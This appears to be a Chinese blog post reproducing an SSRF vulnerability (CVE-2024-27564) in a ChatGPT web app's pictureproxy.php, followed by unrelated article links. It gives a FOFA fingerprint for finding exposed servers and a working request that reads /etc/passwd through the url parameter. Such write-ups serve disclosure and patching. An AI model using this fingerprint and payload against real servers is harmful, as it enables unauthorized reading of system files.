【漏洞复现】chatgpt pictureproxy.php SSRF漏洞(CVE-2024-27564)

0x01 漏洞概述

ChatGPT pictureproxy.php接口存在服务器端请求伪造 漏洞(SSRF) ,未授权的攻击者可以通过将构建的 URL 注入 url参数来强制应用程序发出任意请求。

0x02 测绘语句

复制代码
fofa: icon_hash="-1999760920"

0x03 漏洞复现

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1

0x04 影响范围

复制代码
chatgpt

0x05 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
杯莫停丶13 小时前
设计模式之:模板模式
开发语言·设计模式
开发者小天13 小时前
调整为 dart-sass 支持的语法,将深度选择器/deep/调整为::v-deep
开发语言·前端·javascript·vue.js·uni-app·sass·1024程序员节
老猿讲编程14 小时前
C++中的奇异递归模板模式CRTP
开发语言·c++
落落鱼201316 小时前
Dompdf库html生成pdf时editor编辑器中文本长度被截断不会自动换行问题处理
pdf·编辑器·php·html生成pdf
汤姆yu16 小时前
基于python的化妆品销售分析系统
开发语言·python·化妆品销售分析
ScilogyHunter16 小时前
C语言标准库完全指南
c语言·开发语言
sali-tec16 小时前
C# 基于halcon的视觉工作流-章52-生成标定板
开发语言·图像处理·人工智能·算法·计算机视觉
应茶茶16 小时前
C++11 核心新特性:从语法重构到工程化实践
java·开发语言·c++
程子的小段17 小时前
C 语言实例 - 字符串复制
c语言·开发语言
-森屿安年-17 小时前
STL 容器:stack
开发语言·c++